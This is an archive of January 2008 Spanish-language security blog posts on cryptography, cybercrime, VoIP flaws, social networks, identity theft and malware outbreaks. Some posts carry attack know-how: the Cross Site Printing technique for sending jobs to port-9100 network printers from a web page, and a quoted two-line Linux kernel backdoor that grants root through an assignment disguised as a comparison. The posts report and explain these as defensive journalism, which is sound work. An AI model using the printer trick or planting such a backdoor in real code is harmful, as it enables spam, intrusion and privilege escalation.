Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

martes, 29 de enero de 2008

VIDEOS EDUCATIVOS SOBRE HASH Y PKI
Se trata de dos videos educativos realizados por la gente de Nexmedia donde en el primero de ellos Osvaldo Rodriguez, Editor Tecnológico de la Revista NEX IT, explica cómo funciona un resumen de HASH.

En el segundo video, Pablo Anselmo, Gerente de Seguridad Informática de Microsoft, explica el funcionamiento de PKI (Infraestructura de Clave Pública).

Infraestructura de Clave Pública




HASH





jam

Ver más

martes, 22 de enero de 2008

FUNDAMENTOS SOBRE CRIPTOGRAFIA (NOTA 2 DE 5)
Garantizar comunicaciones seguras y confiables no es una tarea sencilla, sobre todo teniendo
en cuenta que día a día surgen nuevas metodologías y técnicas de ataques dirigidos que
atentan contra los sistemas informáticos con el objetivo de obtener información sensible y
confidencial de los usuarios.

Paralelamente a ello, en la vida cotidiana, cada vez que una persona ingresa a su Home Banking, cuando utiliza el cajero automático para realizar transacciones, cuando utiliza el teléfono celular o cuando simplemente accede a la computadora a través de un proceso
de autenticación (usuario y contraseña), en forma totalmente transparente y sin percibirlo, está haciendo uso de diferentes sistemas que involucran procedimientos y sistemas criptográficos.

En este aspecto, implementar mecanismos que permitan ocultar la información se ha convertido
en una necesidad innegable e inmutable de los sistemas de seguridad, siendo prácticamente imposible encontrar en la actualidad un sistema informatizado que no utilice algún sistema de protección, constituyendo una herramienta fundamental y decisiva para las implementaciones de de protección que operan por canales vulnerables.

Seguir leyendo

jam

Ver más

viernes, 18 de enero de 2008

SCHNEIER: "EL CIBERCRIMEN ES COMO EL NARCOTRÁFICO"
Por MERCÈ MOLIST

A Bruce Schneier, la revista The Economist le llama "gurú de la seguridad informática". Asesora a empresas a través de la suya, Counterpane, que recientemente adquirió British Telecom. Algunos de sus muchos fans mantienen, con su aquiescencia, la página humorística Los hechos de Bruce Schneier, donde entre otros destacan: "Cuando Dios necesita un nuevo certificado seguro, se lo pide a Schneier".

A partir de sus frecuentes viajes para dar charlas, como la que impartió en la II Jornada Internacional del ISMS Forum Spain en Madrid, Schneier se ha convertido en uno de los mayores críticos de las medidas de seguridad de los aeropuertos del mundo. Ha pasado por el de Barajas: "Nada que objetar. Me ha parecido rápido y fácil; poco que ver con el sinsentido de los aeropuertos americanos".

Sobre la seguridad informática, el mensaje de Schneier es claro: el cibercrimen crece a pasos de gigante porque es rentable. "Podría compararse al narcotráfico, no tenemos datos reales que confirmen su auténtico alcance ya que las víctimas, los bancos y empresas, no informan de los ataques por temor a que la gente pierda confianza", asegura.

Según el experto, aunque las técnicas y tácticas del cibercrimen están en constante evolución, el principal cambio ha sido el paso "del hacker feliz al hacker criminal en grupos organizados que funcionan como un negocio, vendiendo programas para atacar objetivos cada vez más concretos" y denuncia que "un solo grupo es responsable de una tercera parte del correo basura".

Schneier es siempre muy crítico con Microsoft, especialmente con su política de publicar parches de seguridad sólo una vez al mes: "Mientras tanto, todos los sistemas que son vulnerables tienen estos agujeros abiertos, olvidando que la seguridad de mi red depende de la tuya y viceversa, y todas de la de mi madre".

El experto asegura que nada puede hacerse con las personas que no saben mantener sus ordenadores personales seguros: "Dejémosles tranquilos"; pero en cambio ve dos salidas para la empresa: "El mercado, que cada vez vende más productos de seguridad, aunque esto no significa que sean buenos, y la regulación, con leyes o con iniciativas privadas para protegerse".

A pesar de defender las leyes, se muestra contrario a dos directivas europeas: la ilegalización de las herramientas de hacking, porque "pueden servir tanto para el bien como para el mal", y la retención de los datos, porque "no sirve para cazar a los criminales y alguien puede robar estos datos que son privados". Para el experto, "la mejor forma de que la información esté segura es que no exista, que no se guarden los datos".

Según Schneier, la economía es crucial en la lucha contra el cibercrimen. Nombra algunas leyes del mercado tecnológico que inciden en la seguridad: "El efecto red, donde cuánta más gente usa algo, más valor tiene; el que la copia sea muy barata; que el valor de una compañía se mida por lo que costará a la gente dejar otra marca y usar la suya; que el vendedor sepa más sobre el producto que el comprador y la externalización: que yo no tomo la decisión".

Fuente: http://www.elpais.com

Ver más

PRESENTACIONES: DISI 2007

Se encuentran disponibles las presentaciones del Segundo Dí­a Internacional de la Seguridad de la Información - DISI 2007.

Desde la sección Ponencias del menú principal del site de DISI pueden descargarse las presentaciones realizadas en este congreso celebrado el 3 de diciembre de 2007 en la EUITT-UPM.
  • A Fool's Errand: Inventing Public Key Cryptography. Martin Hellman, Universidad de Stanford - Estados Unidos
  • Avances en la Factorización Entera. Hugo Scolnik, Universidad de Buenos Aires - Argentina
  • Evolución del Malware: Malware 2.0. Sergio de los Santos, Hispasec Sistemas - España
  • Antiphising y Antitroyanos. Flujo Malware. Sergio de los Santos, Hispasec Sistemas - España
  • Seguridad en Entornos Linux. Fernando Acero, Hispalinux - España
  • El Fracaso del Software. Juan Carlos Garcia Cuartango, Instituto para la Seguridad en Internet - España.

En fecha próxima se pondrán en este servidor los vídeos de las presentaciones de los ponentes.

Fuente: http://seguridad-informacion.blogspot.com/2008/01/presentaciones-disi-2007.html

Ver más

TOP 5 VULNERABILIDADES DE VOIP EN 2007
Sipera Systems ha recopilado las 5 más importantes vulnerabilidades en VoIP durante este año 2007 , que ya dejamos.

Estas son:
  • Escucha remota (remote eavesdropping) de llamadas VoIP.
  • "VoIP Hopping",es uno de los componentes de las escuchas remotas, pero compromete Vlans, que previamente han podido ser securizadas, permitiendo a los hackers acceders a plataformas VoIP.
  • Vishing, el phising de la VoIP: Permite a los hackers falsear tu caller id (identificación de llamadas) y hacerse pasar por quien no es. Se podría acceder a información sensible en sistema de banca , etc..
  • Fraude en llamadas: Acceso a redes empresariales VoIP y realizar llamadas sobre ellas.
  • El Gusano de Skype, w32/Ramex. Este virus se expande por mensajería instantánea , cambia el estado del usuario Skype a "No molestar" e inhibe a las herramientas de seguridad del acceso al ordenador.

Ver más

LA NUEVA CARA DEL CYBERCRIMEN
Pongo a su disposición el trailer del documental "The New Face of Cybercrime", con este documental (que saldrá pronto a la luz) la empresa de seguridad Fortify pretende mostrar "La Nueva Cara del Cyber Crimen" cómo paso de ser una actividad de algunos jóvenes adolescentes a una verdadera red delincuencial que mueve millones de dolares al año.

Fuente: http://www.dragonjar.us/la-nueva-cara-del-cyber-crimen-the-new-face-of-cybercrime.xhtml

Ver más

CÓMO EL FENÓMENO DE LAS REDES SOCIALES EN LÍNEA AL ESTILO DE FACEBOOK O MYSPACE
El año último ganaron mucha popularidad y son un negocio gigantesco. Se usan para estar en contacto con amigos, pero también para conocer a otras personas. Qué hay que tener en cuenta a la hora de usarlas.

MySpace tiene 110 millones de usuarios activos en el mundo. Hi5 , 70 millones de usuarios registrados. Orkut , 67 millones. Facebook , unos 60 millones. Friendster , 53 millones. Todas son redes sociales en línea; fueron uno de los servicios con más crecimiento en la Red el año último, y se preparan seguir siendo un fenómeno en 2008.

Antes de Internet, el estar conectado significaba contar con una vasta red de amigos y conocidos. Después, la Web y la posibilidad de conectarse en forma instantánea con otros, sin importar su ubicación, dieron pie a servicios que facilitan mantenerse al tanto de su vida, desde el mensajero instantáneo hasta el weblog como un diario personal público. Otros servicios complementan estas herramientas, como el fotolog, el microblog al estilo Twitter o las comunidades virtuales y foros de discusión, donde se puede conocer gente con gustos similares (al estilo de Psicofxp.com , MaximoPC.org o Bsasinsomnio.com.ar , entre otros).

En ese contexto surgieron las redes sociales en línea, sitios que permiten generar un perfil público, donde el usuario ofrece datos personales y accede a diversas herramientas para interactuar en línea con otras personas, mantenerlas al tanto de su quehacer cotidiano, conversar y demás.

"Son como un servicio de blog para no expertos, donde ponés fotos, aplicaciones para jugar o relacionarte, tenés un qué estoy haciendo que es como un Twitter integrado. Y es una forma de ampliar tu red de conocidos, de encontrar grupos de gente con tus mismos intereses", afirma Alejo Zagalsky.

"En 1999 participé de un viaje por el país. Después, durante un tiempo nos encontrábamos para ver fotos y mantenernos en contacto, pero eso se perdió -recuerda Virginia Rivera-. Hace un par de meses encontré en la red a una amiga que tenía en común con otra persona, que a su vez era amiga de una ex compañera de trabajo, y que había participado de ese viaje. Hace dos semanas nos reunimos después de no vernos por años."

Ambos usan Facebook, que nació en 2004 de la mano del estudiante de Harvard Mark Zuckerberg, como un lugar para que los universitarios se mantuvieran al tanto de la vida de sus amigos y ex compañeros de estudios. No fue la primera: en 1999 nació MySpace, que ofrecía un sitio Web para tener una página personal sencilla, especificar intereses y qué clase de gente se quería conocer. Después incorporó funciones multimedia, entre otras, y hoy es muy usada por bandas de música para difundir su obra. LinkedIn , la red social corporativa, nació en 2003: permite tener una versión en línea de nuestro currículum, conectarnos con colegas y seguir el camino laboral de ex compañeros de trabajo. Además, muchos lo usan para llegar a un tercero a través de alguien de la propia red.

"Es una herramienta laboral. Puedo buscar gente que tenga cierto perfil que necesito; recibí ofertas laborales y propuestas de gente que quiere trabajar en mi companía. Reviso los contactos de mis contactos y encuentro gente a la que le había perdido el rastro", explica Natalia Martínez, usuaria de LinkedIn.

Visible para todos

Los usuarios deciden a quién suman a su red, si los conocen o comparten un interés que fomente una nueva amistad. Según Facebook, el promedio tiene 150 contactos, pero varios superan los mil, e incluso llegaron al límite: 5000 contactos para una misma persona. Por lo general es alguien famoso que usa la red para difundir sus actividades.

"Sumar amigos tiene que ver también con una búsqueda de identidad, en un contexto histórico en el que las instituciones tradicionales se debilitan y dejan de funcionar como puntos de referencia para formar identidad -afirma Martín Becerra, profesor de Políticas de Comunicación en la Universidad de Quilmes e investigador del Conicet-. Al sumar y mostrar esos amigos hay algo de exhibicionismo, pero también de acreditar valores, mostrar un vínculo de confianza con otros. Es un remedo de este anclaje identitario que se está perdiendo."

Lo que no todos los usuarios tienen en claro es que una página personal en Facebook, LinkedIn, MySpace u otros es una ventana al mundo. Si las opciones de privacidad no se configuran correctamente, muestra a cualquiera dónde nació ese usuario, dónde trabaja, quiénes son sus amigos, qué música le gusta, qué hizo el fin de semana y con quién, por ejemplo.

"Lo que no es apropiado para lo público no lo publico. Si está ahí es porque no va a generar ningún conflicto; caso contrario, lo levanto -dice Gastón Terrones, usuario de Facebook-. Es común encontrar que otros contactos suben fotos de uno, y a veces uno no está cómodo con ellas, pero la misma red te permite fijar tu posición."

Un dato personal está a un par de clics de distancia de cualquiera. En diciembre último, la estadounidense Sandra Soroka le informó a su novio (y a todo Facebook) que su relación había terminado, y lo contó en su perfil. Su compatriota Kevin Colvin pidió en octubre unos días en el trabajo por problemas familiares y publicó luego unas fotos de una fiesta a la que asistió en los días en los que se suponía que estaba de viaje, y su jefe las vio.

También hay información falsa: cualquiera puede crear un usuario en una red y elegir el nombre que desee. Por ejemplo, un perfil del hijo de Benazir Buttho, denunciado como falso y luego quitado de Facebook, o en esa misma red, de Cristina Fernández de Kirchner y su esposo: no hay manera, con las herramientas del sitio, de comprobar si son verdaderos o no.

Negocios en red

Estos servicios son un imán para los negocios. MySpace fue comprada en 2005 por News Corp., que pagó entonces US$ 580 millones. A mediados de 2007 le tocó el turno a Facebook: Microsoft pagó US$ 240 millones por el 1,6% de esa red social; le dio un valor de mercado teórico que ronda los US$ 15.000 millones. Y según un estudio de la firma eMarketer divulgado en diciembre último, se estima una inversión mundial en redes sociales de US$ 1200 millones, monto que crecería a 4100 millones en 2011.

Para una empresa que quiere vender sus productos son un paraíso: los miembros explicitan sus intereses. Si no, la red los recolecta. En noviembre, Facebook lanzó Beacon, un polémico sistema de seguimiento de actividades comerciales de sus usuarios en otros sitios, que luego tuvo que poner como opcional.

También surgen redes con una orientación específica, como Dorbit ( http://dorbit.net ), que creó Gerardo Gallo en 2006. "El siguiente paso de las redes sociales es la especialización. Ya existen redes especialmente destinadas a deportistas, músicos, profesionales, sólo por nombrar algunas." Dorbit tiene una fuerte orientación hacia el conocimiento de otras personas; no hace falta registrarse para ver los perfiles de los usuarios.

Con otro objetivo surgió TuBlip ( www.tublip.com ), todavía en desarrollo. "La Web 2.0 permite crear un ámbito donde la gente interactúa y produce contenidos -afirma Carlos Cárcano, uno de sus creadores-. La red social es ideal para democratizar la difusión de contenidos hechos por los usuarios. En TuBlip vamos a ofrecer una radio on line al estilo de Last.fm, un lugar donde los músicos puedan publicar y vender sus obras, recomendar cosas a otros usuarios o generar recitales, por ejemplo."

El valor de una red social está en su atractivo y en los amigos que suma; habrá que esperar y ver cuáles captan la atención de los usuarios y triunfan.

Ver más

lunes, 14 de enero de 2008

CROSS SITE PRINTING: ATACANDO A LAS IMPRESORAS DE RED

Basándose en un trabajo de Adrian Crenshaw, Aaron Weaver ha publicado un artículo en el cual detalla una técnica que nos permitiría tomar cierto control de las impresoras de red y haciendo uso de un poco de código JavaScript en una web maliciosa o vulnerable, podríamos iniciar trabajos de impresión, enviar comandos PostScript y en algunos casos enviar hasta faxes, pudiendo así utilizarlas entre otras cosas para realizar SPAM, Phishing y todo lo que a uno se le pueda ocurrir.

El problema

Muchas impresoras de red quedan a la escucha en el puerto 9100 por trabajos de impresión. Para probarlo basta con conectarse vía telnet a la misma, escribir algo y desconectarse, luego del cierre de la conexión la impresora comenzara a realizar el trabajo. Cabe aclarar que las impresoras locales no resultan afectadas (aun) por esta clase de ataques.

Ataque

Una forma simple de comprobar esta técnica es escribiendo en nuestro navegador la siguiente dirección:

http://ip-impresora:9100/

el navegador establecerá la conexión con la impresora, pero al no tratarse de un servidor web no verá nada en la pantalla, y cuando presione detener o pase el tiempo de espera, la conexión se cerrara y comenzara el trabajo de impresión. El equipo imprimirá las cabeceras de la petición realizada por el navegador, las mismas pueden variar de uno a otro.

Firefox:

GET / HTTP/1.1
Host: impresora-red:9100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es,es;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

Internet Explorer

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: es-es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: impresora-red:9100
Connection: Keep-Alive

Si lo que queremos es realizar una impresión desde un web sin que el visitante lo note, podemos insertar una etiqueta de imagen con la ruta apuntando hacia la impresora de red, el navegador intentara cargar la misma pero luego de unos segundos cerrara la conexión al sobrepasar el tiempo de espera, iniciando así la impresión.

Seguir leyendo

Ver más

CUESTIÓN DE CONFIANZA
Siempre se escucha que Linux es más seguro que Windows, que no hay virus, que al ser libre hay mucha gente que revisa el código, que el diseño de los usuarios y privilegios dificulta que se extiendan, y otros comentarios por el estilo. Lo cierto es que es hay pocos virus, muchos son pruebas de concepto (incluso se desinstalan si se le pide educadamente) y ninguno ha conseguido propagarse eficientemente, con lo que ese riesgo es prácticamente inexistente.

Una de las posibles fuentes de infección masiva, viene del hecho de que el código fuente esté accesible. Una puerta trasera introducida en el código, en caso de pasar desapercibida, podría llegar a miles de usuarios a través de los repositorios de las distintas distribuciones. Estos usuarios confían en el software compilado y firmado por una de estas fuentes oficiales. Normalmente, hay unos pocos desarrolladores que pueden modificar el código o aplicar parches que proponen terceras personas, siempre después de revisarlos, por lo que no es fácil que esto suceda. Por ejemplo, hace unos años hubo un intento de instalar una puerta trasera en el propio kernel de Linux. Eran tan solo 2 lineas:
+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;
Es fácil ver que en (current->uid = 0) no se está comparando current->uid con 0, sino que se se está asignando. Después de este cambio, llamando a la función sys_wait4() con los flags __WCLONE y __WALL, se obtenían permisos de root. En realidad, el código se modificó en una copia del repositorio que contiene el código del kernel y no llegó a publicarse al detectarse a tiempo.

El riesgo de que se introduzca una puerta trasera es bajo, pero es posible, al igual que los bugs pasan desapercibidos y acaban en el usuario. Obviamente, es imposible revisar el código de todo el software que utilizamos (a veces incluso no tenemos esa posibilidad) y tenemos que confiar más o menos en quien desarrolla y distribuye el software. Bueno, siempre nos podemos fiar del código escrito por nosotros mismos, o quizás no.

Ver más

TENDENCIAS SOBRE MALWARE PARA EL 2008
La Empresa ESET que desarrolla y comercializa uno de los mejores productos antivirus, ESET NOD32 Antivirus, ha lanzado un nuevo informe sobre las actividades maliciosas que se esperan para este año 2008.

El documento fue escrito por Cristian Borghello, Technical & Educational Manager de ESET para Latinoamérica y describe cuales son las metodologías y técnicas de infección que utilizarán los códigos maliciosos.

Pueden leer el documento desde:
http://eset-la.com/threat-center/1709-tendencias-2008

Jorge

Ver más

viernes, 11 de enero de 2008

HTTPS: ESA FALSA SENSACIÓN DE SEGURIDAD
Actualmente la web se utiliza para presentar información de empresas, productos y como plataforma para transacciones de negocios y luego tenemos la denominada web social con todos sus peligros ya conocidos.

Muchas de las reglas básicas de seguridad a la hora de realizar operaciones en Internet, recomiendan que la página web que estemos visitando, empiece por https. Hace tiempo que esta afirmación ya dejo de ser cierta.

HTTPS, es un protocolo que utiliza SSL para transportar los mensajes HTTP, todo entre la comunicación cliente y servidor va cifrado por ello que las viejas técnicas de sniffing ya no nos sirven para estos casos. A medida que avanza el tiempo, la tecnología evoluciona y consecuentemente las amenazas de seguridad tambien. Es por ello, que existen proyectos para explicar y clasificar las diferentes amenazas a la seguridad de los sitios web.

Una de las amenazas descrita en el proyecto de webappsec, es XSS, si bien ya tiene bastantes años, son innumerables los sitios que actualmente son vulnerables a ella, quizá sin percatarse de las posibles consecuencias o ignorándolas arriesgadamente. Existen sitios como xssed que las recopilan diariamente. Pero lo que ha ocurrido recientemente en Italia, tendría que activarnos un resorte de alerta y concienciación.

Phising, XSS, botnets, debilidad inherente al ser humano (parte cliente donde los datos aún están en claro), son ya muchas las amenazas y debilidades lo que hace que simplemente porque una página tenga https:// ya podamos confiar en ella. No ignoremos los peligros que existen a pesar de ello.
Como en aquella famosa canción original de Cole Porter, "Use your mentality,
wake up to reality." Tenemos que adaptarnos a los tiempos actuales con todo lo que ello conlleva, pero al menos que no nos cojan desprevenidos.

Fuente: http://blog.s21sec.com/2008/01/https-esa-falsa-sensacin-de-seguridad.html

Ver más

IMPRESIÓN DE SPAM A TRAVÉS DE SITIOS WEB MALICIOSOS
La nueva técnica ha sido publicada por Aaron Weaver y bautizada como Cross Site Printing. Se basa en lanzar un trabajo de impresión desde una página web, aprovechando una funcionalidad poco conocida de los navegadores y la capacidad de escuchar el puerto 9100 de muchas impresoras de red. El ataque se inicia desde una página web maliciosa, o bien desde una que sufre una vulnerabilidad de Cross Site Scripting (XSS), a través de la cual el atacante inyecta código javascript en el navegador de sus visitantes.

El usuario particular puede sentirse a salvo porque sólo resultan afectadas impresoras de red y no las impresoras locales conectadas directamente al PC, pero las impresoras compartidas de empresas, organismos y oficinas están en peligro. De momento sólo pueden imprimirse textos sencillos en ASCII y Postscript, pero las perspectivas futuras pueden ser preocupantes: envío de comandos o faxes, control de la impresora por un intruso, etc...

Tanto Firefox como Explorer son vulnerables, si bien en Mozilla ya han manifestado que no existe inconveniente en añadir el puerto 9100 a la lista negra de puertos bloqueados en Firefox.

Fuente:
http://www.kriptopolis.org/spam-en-impresoras-de-red
http://www.pcworld.com/article/id,141239-pg,1/article.html
http://www.net-security.org/dl/articles/CrossSitePrinting.pdf

Ver más

ROBO DE IDENTIDAD: UN PROBLEMA REAL
Un cartonero figura en el Veraz por "deudas de otros"

Vive en una humilde casa de Rosario. Para el Banco Central es "deudor irrecuperable".

Un aparente robo de identidad ha convertido en pesadilla la vida de Guillermo Hassan, dedicado a recolectar cartones desde que en 2004 perdió su empleo como personal de limpieza en un hospital de Rosario. Con 43 años y tres hijos a cargo, el hombre relata a Clarín su calvario que lo llevó a acumular una gran deuda —de acuerdo a un informe del Veraz que exhibe— con bancos que, jura, jamás conoció y tarjetas que no utilizó.

El Banco Central lo ubica en la categoría de deudor irrecuperable, y actualmente acumula deuda por 35.800 pesos con Renova, Macro Bansud y tarjeta Naranja.

Los problemas de Hassan comenzaron en abril de 2000. Una cédula lo notificaba sobre una deuda impaga con el Amro Bank por 6.680 dólares. Las intimaciones se multiplicaron: sucursales bancarias de Capital Federal, un lugar que nunca visitó, reclamaban por 150 cheques emitidos sin fondo, tarjetas de crédito impagas y cajas de ahorro vaciadas.

El hombre tiene una copia de la apertura de cuenta del Amro Bank, que tiene todos sus datos: el mismo nombre, idéntico número de documento, igual identificación de CUIL. Apenas se consignaban referencias inexactas en la identificación de sus padres y en la residencia permanente. El supuesto estafador apuntó un domicilio de Capital, donde tiempo después ya no vivía nadie.

Aunque tomaron sus datos, Hassan aclara que jamás perdió su Documento Nacional de Identidad. Es más, muestra el original con su foto de 18 años. Ahora pide ayuda porque ni siquiera puede afrontar los honorarios de un abogado ni el viaje a Buenos Aires, donde está radicada su causa.

"¿Cómo a un simple obrero lo van a habilitar para gastar semejante cantidad de plata?", se pregunta Hassan, preocupado ante la posibilidad de perder su única posesión material: la modesta vivienda en la que vive junto a su familia y en la que acopia cartones para seguir subsistiendo.

Fuente: http://www.clarin.com/diario/2006/09/09/sociedad/s-05403.htm

Ver más

FOTOLOGS Y LA RESPONSABILIDAD DE LO QUE SUBIMOS
Luego de un merecido descanso de la web y todo lo que ella implica, me propongo arrancar otra vez con este humilde blog. Esta vez analizando brevemente un fenómeno que se da entre nuestros adolescentes: los fotologs.

Se puede decir que, "si algo está en Internet, está gratis para todo el mundo". Pero ¿está realmente para todos? No hace falta ser muy inteligente para darse cuenta que no es así. Ahora si lo que nosotros subimos a la red está para nuestros amigos, nuestros familiares, nuestros conocidos; los familiares, amigos y conocidos de nuestros amigos; y los familiares, amigos y conocidos de nuestros conocidos; ¿no podemos decir que está gratis para todo nuestro mundo? Si está para nuestro entorno ¿no podemos llegar a pensar que está para todos?

Pero ¿por qué planteo esto? La proliferación de los blogs en general y en particular de los fotoweblogs o fotologs, ha hecho que muchísima gente, en su mayoría adolescentes, suban a la red cantidades incalculables de fotos, que quedan a disposición de "nuestro mundo conectado" (1). Ya no importa si son nuestros cinco amigos/amigas las que las ven, o si es el curso entero (unos 40 compañeros) los que verán las fotos que subimos, se trata de miles y miles de personas que podrán eventualmente llegar a nuestro fotolog y ver lo que era para cinco (2).

Es tan facil abrir un fotolog que miles de adolescentes lo hacen a diario. Lo utilizan como una forma de "escrachar" a su "enemigo casual" o para compartir alguna foto que pocos conocen. También "escracho" significa algo así como "mamarracho", pero no se si ese es el sentido que le quieren dar. Veamos los nombres que utilizan:


Los fotologs vienen arrasando entre la juventud y nuestros adolescentes, esperemos que también crezca la responsabilidad que implica "subir" algo (una foto) a la red de redes. Me quedo pensado si somos más responsables de lo que subimos a la red, o de lo que bajamos de ella... es una duda, nada más.

Fuente: http://seguridadtotal.blogspot.com/2008/01/fotologs-y-la-responsabilidad-de-lo-que.html

Ver más

miércoles, 9 de enero de 2008

CALL FOR PAPERS DE SEGU-INFO
En el día de la fecha realizamos la apertura del Call For Paper de Segu-Info, con el objetivo de que los participantes entreguen un documento con un tema de su elección y con la posibilidad de ganar importantes premios.

Este Call For Paper es una iniciativa de Segu-Info, la comunidad de Seguridad de la Información que reúne a más de 5.000 miembros en todo el mundo siendo esta, la más grande de habla hispana.

Si crees que este Call For Paper puede interesarle a alguno de tus conocidos o compañeros de trabajos, comunícaselo y reenviale este correo, así también nos estarás ayudando a difundir este concurso tan importante.

Esperamos contar con la participación de todos los interesados.

¡Gracias por participar del Call For Paper de Segu-Info!

SoloE

Fuente: www.segu-info.com.ar

Ver más

VIRUS DEL SECTOR DE ARRANQUE: ¿EL RETORNO?
a resultó curioso asistir hace unos meses a la reencarnación de Stoned.Angelina en miles de flamantes portátiles con Windows Vista, pero aquella curiosidad amenaza ahora convertirse en moda (retro, pero moda ;), al informar la gente de GMER de la aparición de un stealth MBR rootkit, es decir, otro sorprendente especimen que también habita el MBR, utilizando además técnicas de rootkit para ocultarse de Windows y de los antivirus habituales.

Esta pieza muestra cierta preferencia por ordenadores europeos, habiendo convertido ya a miles de ellos en su residencia habitual. Aunque el concepto data de varios años atrás, su aparición en vivo ha sido detectada a finales de 2007. No dispone aún de nombre oficial, parece ser de origen ruso y se ha podido desplegar a partir de sitios web infectados con exploits. Para colmo, sirve de escondrijo para troyanos ladrones de contraseñas y de momento sólo lo descubre el detector de rootkits de GMER, sucumbiendo luego a fixmbr...

Afecta a Windows XP en modo Administrador y menos a Windows Vista, en parte porque el código para este sistema tiene algún fallo y en parte gracias a la UAC.

Ver más

ATAQUE MASIVO A MILES DE SITIOS WEBS A TRAVÉS DE SCRIPTS

Tal y como comentabamos ayer se han encontrado gran cantidad de sitios conocidos y confiables (incluso mucho de ellos educativos, gubernamentales y de la lista Fortune 500) que apuntan a scripts hosteados en sitios chinos y que permiten la descarga de archivos ejecutables dañinos.

En este momento se registran alrededor de 120.000 sitios afectados, de los cuales un porcentaje importante son sitios en español (clic en la imagen para ver más grande).

Cantidad de sitios afectados

Aparentemente, a través de un ataque de SQL Injection, decenas de miles de sitios que utilizan Microsoft SQL Server han sido modificados agregando enlaces a sitios dañinos en sus tablas de la base de datos.

A través de estas modificaciones se ha logrado que cada vez que se ingrese al sitio atacado, se cargue en el navegador del usuario un Javascript que invoca a otros scripts que explotan diversas vulnerabiliades en el sistema operativo, navegador y aplicaciones del usuario:
  • Vulnerabilidad MDAC (Microsoft Data Access Components), ya corregida por Microsoft en abril de 2006 con la actualización MS06-014.
  • Vulnerabilidad en Yahoo! Messenger ya corregida.
  • Una vulnerabilidad en Real Player solucionada en octubre de 2007 y otra vulnerabilidad en RealPlayer reportada este 3 de enero y aún no corregida. Si Ud. dispone de Real Player instalado, extreme la precauciones.
A modo de ejemplo analicemos un caso de un conocido (y muy visitado) sitio de musica latinoamericano que se ha visto afectado. Al momento de escribir el presente, este sitio ya ha solucionado y solventado el ataque.

Al ingresar al sitio lo único que se notará es una carga "más lenta" del mismo. Esto sucede debido a que múltiples sitios y archivos están siendo invocados y descargados en este momento de otros servidores. En el sitio puede verse lo siguiente:

Sitio atacado

Al descargar el código fuente pueden verse los enlaces al script dañino en el sitio uc8010[dot]com (o ucmal[dot]com en otros casos) y ejecutando el archivo Javascript 0.js múltiples veces. Si Ud. es administrador de red le recomendamos bloquear estos sitios de inmediato.

Código HTML del sitio

Esto es debido a que la inyección SQL ha impactado en diversas tablas y esto permite la modificación masiva de las cabeceras del archivo HTML involucrado. Los dominios mencionados han sido registrados el 28 de diciembre pasado y evidentemente el único fin ha sido el de crear este ataque masivo.

A continuación, si el usuario dispone de algunas de las vulnerabilidades mencionadas, y no cuenta con una protección antivirus adecuada, se procederá a ejecutar 4 scripts ofuscados que descargan al menos 3 archivos ejecutables dañinos. Estos archivos ejecutables son detectados por la heurística avanzada de ESET NOD32.

Parte del código fuente del archivo 0.js es el siguiente, donde se invoca a un nuevo script llamado w.js:

Código HTML del script

Este script a su vez invoca a nuevos scripts y también ya puede verse el primer código ofuscado que comienza a realizar pruebas de vulnerabilidades en el sistema del usuario:

Código HTML del script
Este proceso de descarga de archivos Javascripts ofuscados (e incluso un Vbscript) continúa y luego de seguir todo el proceso completo se contará con los siguientes archivos descargados:

Archivos descargados

Como puede intuirse con los nombres de los mismos, cada uno de ellos explota una de las vulnerabilidades ya mencionadas. Si estos exploits tienen éxito, el sistema resultara infectado con algún tipo de malware. Los 3 archivos ejecutables que pueden verse en la imagen son troyanos ladrones de contraseñas de juegos en línea. Estos archivos ejecutables son detectados por la heurística avanzada de ESET NOD32 cuando intentan ser descargados:

Detección de ESET NOD32

Si Ud. es administrador de un sitio web recomendamos:
  • Ser muy cuidadosos cuando suceden este tipo de ataques
  • Verificar el código fuente de sus aplicaciones para evitar ataques de SQL Injection (hardening de aplicaciones)
  • Verificar su sitio continuamente para detectar posibles vectores de ataques
  • Bloquear los sitios mencionados en el presente
  • Si Ud. es una de las víctimas informar a sus clientes y visitantes, bajar el sitio si es necesario y solucionar el inconveniente (recuperar la base de datos, sanitizar el código fuente, etc.)
Si Ud. es usuario recomendamos:
  • Aplicar las actualizaciones del sistema operativo y las aplicaciones que utiliza
  • Bloquear los sitios mencionados en el presente
  • Instalar un antivirus con capacidades de detección heurística que evite la descarga de archivos dañinos
Fuentes:
http://blogs.eset-la.com/laboratorio/2008/01/08/ataque-masivo-sitios-web/
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9055858
http://isc.sans.org/diary.html?storyid=3810
http://explabs.blogspot.com/2008/01/so-this-is-kind-of-interesting.html
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9055599
http://www.informationweek.com/shared/printableArticle.jhtml?articleID=205600157
http://websmithrob.wordpress.com/2008/01/07/nuc8010com-real-exploit-hack-via-sql-injection/
http://blog.trendmicro.com/new-realplayer-exploit/
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=EXPL%5FREALPLAY%2EH
http://www.symantec.com/enterprise/security_response/
http://ddanchev.blogspot.com/2008/01/massive-realplayer-exploit-embedded.html

Ver más

EL COLECCIONISTA DE PERFILES

¿No os ha pasado alguna vez que habéis soñado con alguna cosa relacionada a vuestro trabajo? Seguro que sí, desde aventuras increíbles en las que dáis rienda suelta a vuestra imaginación, a finales de infarto donde muchas de vuestros deseos se hacen realidad. Pero también, a veces, en el momento adecuado, aparecen sueños raros.

